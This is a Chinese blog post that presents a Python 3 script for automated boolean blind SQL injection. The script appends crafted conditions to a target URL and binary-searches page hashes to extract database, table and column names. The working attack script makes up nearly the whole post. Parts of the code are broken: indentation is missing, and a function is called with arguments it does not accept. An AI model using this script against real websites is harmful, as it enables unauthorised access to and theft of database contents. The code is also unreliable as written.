python脚本实现半自动化布尔盲注

贴一个python写的布尔盲注脚本,就当保存代码了,以后可以回头参考参考。

运行环境:python3

代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from optparse import OptionParser
import sys
import requests
import hashlib

parser=OptionParser()

parser.add_option("-D", "--database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--url", action="store",type="string",dest="url",help="Please input test url")

(options,args) = parser.parse_args()

def main():
if options.url == None and options.database == None and options.table == None and options.column == None:
print("Please read the help")
parser.print_help()
sys.exit()
elif options.url != None and options.database ==None and options.table == None and options.column == None:
get_all_databases(options.url)
elif options.url != None and options.database !=None and options.table == None and options.column == None:
get_db_all_tables(options.url,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column == None:
get_db_tb_all_columns(options.url,options.database,options.table)
elif options.url != None and options.database !=None and options.table != None and options.column != None:
getAllContent(options.url,options.database,options.table,options.column)



def http_get(url):
result = requests.get(url)
return result.content

#获取数据库
def get_all_databases(url):
db_nums_payload = "select count(schema_name) from information_schema.schemata"
db_numbers = half(url,db_nums_payload)
print("数据库的总个数为:%d" % db_numbers)
for x in range(db_numbers):
db_len_payload = "select length(schema_name) from information_schema.schemata limit %d,1" % x
db_name_numbers = half(url,db_len_payload)

db_name = ""
for y in range(1,db_name_numbers+1):

db_name_payload = "ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (x,y)
db_name += chr(half(url,db_name_payload))

print("第%d个数据库为:%s" % (x+1,db_name))



#获取指定数据库中的表
def get_db_all_tables(url,database):
tb_nums_payload = "select count(table_name) from information_schema.tables where table_schema = '%s'" % database
tb_numbers = half(url,tb_nums_payload)
print("%s数据库中的表个数为:%d" % (database,tb_numbers))

for x in range(tb_numbers):
tb_len_payload = "select length(table_name) from information_schema.tables where table_schema = '%s' limit %d,1" % (database,x)

tb_name_numbers = half(url,tb_len_payload)
# print(tb_name_numbers)
tb_name = ""
for y in range(1,tb_name_numbers+1):

tb_name_payload = "ascii(substr((select table_name from information_schema.tables where table_schema = '%s' limit %d,1),%d,1))" % (database,x,y)
# print(tb_name_payload)
tb_name += chr(half(url,tb_name_payload))
# print(tb_name)
print(database,"数据库中第%d个表为:%s" % (x+1,tb_name))



#获取指定数据库中指定表的字段
def get_db_tb_all_columns(url,database,table):
co_nums_payload = "select count(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s'" % (database,table)
co_numbers = half(url,co_nums_payload)
print("%s 数据库中的 %s 表中的字段个数为:%d" % (database,table,co_numbers))
for x in range(co_numbers):
co_len_payload = "select length(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1" % (database,table,x)
co_name_numbers = half(url,co_len_payload)

co_name = ""
for y in range(1,co_name_numbers+1):

co_name_payload = "ascii(substr((select column_name from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1),%d,1))" % (database,table,x,y)
co_name += chr(half(url,co_name_payload))

print(database,"数据库中",table,"表中第%d个字段名为:%s" % (x+1,co_name))



#获取指定数据库中指定表中指定字段内容
def getAllContent():
pass


#python里面没有MD5加密函数,需要自己写
def md5(str):
hl = hashlib.md5()
hl.update(str)
return hl.hexdigest()


#二分法函数
def half(url,payload):
low = 0
high = 126
standard_html = md5(http_get(url))
# print(standard_html)
while low <= high:
mid=(low + high)/2
mid_num_payload = url + " and (%s) > %d-- " % (payload,mid)
# print(mid_num_payload)
mid_html = md5(http_get(mid_num_payload))
#print(mid_html)
if mid_html == standard_html:
low = mid + 1
else:
high = mid - 1
mid_num = int((low+high+1)/2)
return mid_num


if __name__ == '__main__':
main()

运行结果:

mark

坚持原创技术分享,您的支持将鼓励我继续创作!